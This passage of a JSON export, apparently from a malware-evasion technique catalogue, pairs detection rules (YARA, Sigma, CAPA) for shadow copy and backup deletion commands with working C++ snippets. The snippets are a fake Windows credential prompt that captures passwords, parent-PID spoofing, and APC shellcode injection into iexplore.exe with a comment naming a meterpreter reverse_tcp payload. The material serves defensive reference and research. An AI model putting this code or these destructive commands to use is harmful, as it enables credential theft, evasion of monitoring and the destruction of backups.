                    "id": 56,
                    "key": "capa_delete_volume_shadow_copy",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Delete_Volume_Shadow_Copy",
                    "rule": "rule:\r\n  meta:\r\n    name: delete volume shadow copies\r\n    namespace: impact/inhibit-system-recovery\r\n    author: moritz.raabe@mandiant.com\r\n    scope: function\r\n    att&ck:\r\n      - Impact::Inhibit System Recovery [T1490]\r\n      - Defense Evasion::Indicator Removal on Host::File Deletion [T1070.004]\r\n    mbc:\r\n      - Impact::Data Destruction::Delete Shadow Copies [E1485.m04]\r\n    examples:\r\n      - B87E9DD18A5533A09D3E48A7A1EFBCF6:0x140006AF0\r\n  features:\r\n    - or:\r\n      - string: /vssadmin.* delete shadows/i\r\n      - string: /vssadmin.* resize shadowstorage/i\r\n      - string: /wmic.* shadowcopy delete/i"
                },
                {
                    "id": 34,
                    "key": "sigma_posh_pc_delete_volume_shadow_copies",
                    "type": {
                        "id": 3,
                        "name": "SIGMA",
                        "syntax_lang": "yaml"
                    },
                    "name": "SIGMA_posh_pc_delete_volume_shadow_copies",
                    "rule": "title: Delete Volume Shadow Copies Via WMI With PowerShell\r\nid: 87df9ee1-5416-453a-8a08-e8d4a51e9ce1\r\ndescription: Shadow Copies deletion using operating systems utilities via PowerShell\r\nreferences:\r\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md\r\n    - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_shadow_copies_deletion.yml\r\n    - https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\ntags:\r\n    - attack.impact\r\n    - attack.t1490\r\nstatus: experimental\r\nauthor: frack113\r\ndate: 2021/06/03\r\nmodified: 2021/10/16\r\nlogsource:\r\n    product: windows\r\n    category: ps_classic_start\r\n    definition: fields have to be extract from event\r\ndetection:\r\n    selection_obj:\r\n        HostApplication|contains|all:\r\n            - 'Get-WmiObject'\r\n            - ' Win32_Shadowcopy'\r\n    selection_del:\r\n        HostApplication|contains:\r\n            - 'Delete()'\r\n            - 'Remove-WmiObject'\r\n    condition: selection_obj and selection_del\r\nfields:\r\n    - HostApplication\r\nfalsepositives:\r\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
                },
                {
                    "id": 37,
                    "key": "sigma_proc_creation_win_shadow_copies_deletion",
                    "type": {
                        "id": 3,
                        "name": "SIGMA",
                        "syntax_lang": "yaml"
                    },
                    "name": "SIGMA_proc_creation_win_shadow_copies_deletion",
                    "rule": "title: Shadow Copies Deletion Using Operating Systems Utilities\r\nid: c947b146-0abc-4c87-9c64-b17e9d7274a2\r\nstatus: stable\r\ndescription: Shadow Copies deletion using operating systems utilities\r\nauthor: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)\r\ndate: 2019/10/22\r\nmodified: 2021/10/24\r\nreferences:\r\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\r\n    - https://blog.talosintelligence.com/2017/05/wannacry.html\r\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\r\n    - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\r\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\r\n    - https://github.com/Neo23x0/Raccine#the-process\r\n    - https://github.com/Neo23x0/Raccine/blob/main/yara/gen_ransomware_command_lines.yar\r\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\r\ntags:\r\n    - attack.defense_evasion\r\n    - attack.impact\r\n    - attack.t1070\r\n    - attack.t1490\r\nlogsource:\r\n    category: process_creation\r\n    product: windows\r\ndetection:\r\n    selection1:\r\n        Image|endswith:\r\n            - '\\powershell.exe'\r\n            - '\\wmic.exe'\r\n            - '\\vssadmin.exe'\r\n            - '\\diskshadow.exe'\r\n        CommandLine|contains|all:\r\n            - shadow  # will match \"delete shadows\" and \"shadowcopy delete\" and \"shadowstorage\"\r\n            - delete\r\n    selection2:\r\n        Image|endswith:\r\n            - '\\wbadmin.exe'\r\n        CommandLine|contains|all:\r\n            - delete\r\n            - catalog\r\n            - quiet # will match -quiet or /quiet\r\n    selection3:\r\n        Image|endswith: '\\vssadmin.exe'\r\n        CommandLine|contains|all:\r\n            - resize\r\n            - shadowstorage\r\n            - unbounded\r\n    condition: 1 of selection*\r\nfields:\r\n    - CommandLine\r\n    - ParentCommandLine\r\nfalsepositives:\r\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
                },
                {
                    "id": 63,
                    "key": "yara_shadow_copy_deletion",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_SHADOW_COPY_DELETION",
                    "rule": "rule shadow_copy_deletion {\r\n    meta:\r\n      description = \"Detect shadow copy deletion\"\r\n      author = \"ditekSHen/Unprotect\"\r\n\r\n    strings:\r\n        $x1 = \"cmd.exe /c \\\"vssadmin.exe Delete Shadows /all /quiet\\\"\" fullword ascii\r\n        $x2 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" fullword ascii\r\n        $cmd1 = \"cmd /c \\\"WMIC.exe shadowcopy delet\\\"\" ascii wide nocase\r\n        $cmd2 = \"vssadmin.exe Delete Shadows /all\" ascii wide nocase\r\n        $cmd3 = \"Delete Shadows /all\" ascii wide nocase\r\n        $cmd4 = \"} recoveryenabled no\" ascii wide nocase\r\n        $cmd5 = \"} bootstatuspolicy ignoreallfailures\" ascii wide nocase\r\n        $cmd6 = \"wmic SHADOWCOPY DELETE\" ascii wide nocase\r\n        $cmd7 = \"\\\\Microsoft\\\\Windows\\\\SystemRestore\\\\SR\\\" /disable\" ascii wide nocase\r\n        $cmd8 = \"resize shadowstorage /for=c: /on=c: /maxsize=\" ascii wide nocase\r\n        $cmd9 = \"shadowcopy where \\\"ID='%s'\\\" delete\" ascii wide nocase\r\n        $cmd10 = \"wmic.exe SHADOWCOPY /nointeractive\" ascii wide nocase\r\n        $cmd11 = \"WMIC.exe shadowcopy delete\" ascii wide nocase\r\n        $cmd12 = \"Win32_Shadowcopy | ForEach-Object {$_.Delete();}\" ascii wide nocase\r\n        $delr = /del \\/s \\/f \\/q(( [A-Za-z]:\\\\(\\*\\.|[Bb]ackup))(VHD|bac|bak|wbcat|bkf)?)+/ ascii wide\r\n        $wp1 = \"delete catalog -quiet\" ascii wide nocase\r\n        $wp2 = \"wbadmin delete backup\" ascii wide nocase\r\n        $wp3 = \"delete systemstatebackup\" ascii wide nocase\r\n      \r\n    condition:\r\n        (uint16(0) == 0x5a4d and 2 of ($cmd*) or (1 of ($cmd*) and 1 of ($wp*)) or #delr > 4) or (4 of them)\r\n}"
                }
            ]
        },
        {
            "id": 174,
            "unprotect_id": "U1339",
            "name": "User Interaction (Are you human?)",
            "categories": [
                {
                    "id": 1,
                    "key": "sandbox-evasion",
                    "label": "Sandbox Evasion"
                }
            ],
            "description": "User interaction techniques give malware an advantage against sandboxes. For example, the average user has a username and password; as long as the targeted user does not enter their password correctly, the malware withholds execution and so bypasses a possible sandbox analysis.",
            "resources": "https://github.com/hlldz/pickl3",
            "tags": "",
            "snippets": [
                {
                    "id": 70,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 14,
                        "name": "Halil Dalabasmaz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/hlldz",
                        "twitter": "https://twitter.com/hlldz",
                        "website": "artofpwn.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/174/",
                    "description": "",
                    "plain_code": "#include <Windows.h>\r\n#include <tchar.h>\r\n#include <CommCtrl.h>\r\n#include <wincred.h>\r\n#include <iostream>\r\n#include <atlstr.h>\r\n\r\n#pragma comment(lib, \"comctl32.lib\")\r\n#pragma comment(lib, \"Credui.lib\")\r\n\r\nvoid pickl3() {\r\n\r\n\tBOOL loginStatus = FALSE;\r\n\tdo {\r\n\t\tCREDUI_INFOW credui = {};\r\n\t\tcredui.cbSize = sizeof(credui);\r\n\t\tcredui.hwndParent = nullptr;\r\n\t\t//credui.pszMessageText = L\"...\";\r\n\t\tcredui.pszCaptionText = L\"Please verify your Windows user credentials to proceed.\";\r\n\t\tcredui.hbmBanner = nullptr;\r\n\r\n\t\tULONG authPackage = 0;\r\n\t\tLPVOID outCredBuffer = nullptr;\r\n\t\tULONG outCredSize = 0;\r\n\t\tBOOL save = false;\r\n\t\tDWORD err = 0;\r\n\r\n\t\terr = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);\r\n\t\tif (err == ERROR_SUCCESS) {\r\n\t\t\tWCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tDWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;\r\n\t\t\tDWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;\r\n\t\t\tDWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;\r\n\t\t\tCredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);\r\n\r\n\t\t\tWCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tCredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);\r\n\r\n\t\t\tHANDLE handle = nullptr;\r\n\t\t\tloginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &handle);\r\n\r\n\r\n\t\t\tif (loginStatus == TRUE) {\r\n\t\t\t\tCloseHandle(handle);\r\n\t\t\t\tstd::wcout << \"\\n[+] Valid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tstd::wcout << \"\\n[-] Invalid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tloginStatus = FALSE;\r\n\t\t\t}\r\n\t\t}\r\n\t} while (loginStatus == FALSE);\r\n}\r\n\r\n\r\n\r\nint main () {\r\n\t\r\n\tpickl3();\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 173,
            "unprotect_id": "U1234,T1134.004",
            "name": "Parent PID Spoofing",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                },
                {
                    "id": 10,
                    "key": "Defense-Evasion-Mitre",
                    "label": "Defense Evasion [Mitre]"
                }
            ],
            "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. \r\n\r\nOne way of explicitly assigning the PPID of a new process is via the `CreateProcess` API call, which supports a parameter that defines the PPID to use. This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.\r\n\r\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment. This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.\r\n\r\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.",
            "resources": "https://github.com/hlldz/APC-PPID\r\nhttps://attack.mitre.org/techniques/T1134/004/",
            "tags": "",
            "snippets": [
                {
                    "id": 85,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/173/",
                    "description": "Original Source code: https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
                    "plain_code": "#include <windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nint main() \r\n{\r\n\tSTARTUPINFOEXA si;\r\n\tPROCESS_INFORMATION pi;\r\n\tSIZE_T attributeSize;\r\n\tZeroMemory(&si, sizeof(STARTUPINFOEXA));\r\n\t\r\n\tHANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, 6200);\r\n\r\n\tInitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);\r\n\tsi.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);\r\n\tInitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);\r\n\tUpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);\r\n\tsi.StartupInfo.cb = sizeof(STARTUPINFOEXA);\r\n\r\n\tCreateProcessA(NULL, (LPSTR)\"notepad\", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);\r\n\r\n\treturn 0;\r\n}"
                },
                {
                    "id": 69,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 14,
                        "name": "Halil Dalabasmaz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/hlldz",
                        "twitter": "https://twitter.com/hlldz",
                        "website": "artofpwn.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/173/",
                    "description": "",
                    "plain_code": "#include <windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nDWORD getParentProcessID() {\r\n\tHANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n\tPROCESSENTRY32 process = { 0 };\r\n\tprocess.dwSize = sizeof(process);\r\n\r\n\tif (Process32First(snapshot, &process)) {\r\n\t\tdo {\r\n\t\t\t//If you want another process as the parent, change the name here\r\n\t\t\tif (!wcscmp(process.szExeFile, L\"explorer.exe\"))\r\n\t\t\t\tbreak;\r\n\t\t} while (Process32Next(snapshot, &process));\r\n\t}\r\n\r\n\tCloseHandle(snapshot);\r\n\treturn process.th32ProcessID;\r\n}\r\n\r\nint main() {\r\n\r\n\t//Shellcode, for example; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x EXITFUNC=thread -f c\r\n\tunsigned char shellCode[] = \"\";\r\n\r\n\tSTARTUPINFOEXA sInfoEX;\r\n\tPROCESS_INFORMATION pInfo;\r\n\tSIZE_T sizeT;\r\n\r\n\tHANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID());\r\n\r\n\tZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA));\r\n\tInitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);\r\n\tsInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);\r\n\tInitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT);\r\n\tUpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);\r\n\tsInfoEX.StartupInfo.cb = sizeof(STARTUPINFOEXA);\r\n\r\n\tCreateProcessA(\"C:\\\\Program Files\\\\internet explorer\\\\iexplore.exe\", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, reinterpret_cast<LPSTARTUPINFOA>(&sInfoEX), &pInfo);\r\n\r\n\tLPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tSIZE_T *lpNumberOfBytesWritten = 0;\r\n\tBOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), lpNumberOfBytesWritten);\r\n\r\n\tQueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL);\r\n\tResumeThread(pInfo.hThread);\r\n\tCloseHandle(pInfo.hThread);\r\n\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 88,
                    "key": "capa_check_ppid",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_check_PPID",
                    "rule": "rule:\r\n  meta:\r\n    name: spoof parent PID\r\n    namespace: anti-analysis/anti-forensic\r\n    authors:\r\n      - michael.hunhoff@mandiant.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Access Token Manipulation::Parent PID Spoofing [T1134.004]\r\n    references:\r\n      - https://blog.f-secure.com/detecting-parent-pid-spoofing/\r\n    examples:\r\n      - 2ebadd04f0ada89c36c1409b6e96423a68dd77b513db8db3da203c36d3753e5f:0x140002291\r\n  features:\r\n    - and:\r\n      - api: kernel32.UpdateProcThreadAttribute\r\n      - number: 0x20000 = PROC_THREAD_ATTRIBUTE_PARENT_PROCESS"
                }
            ]
        }
    ]
}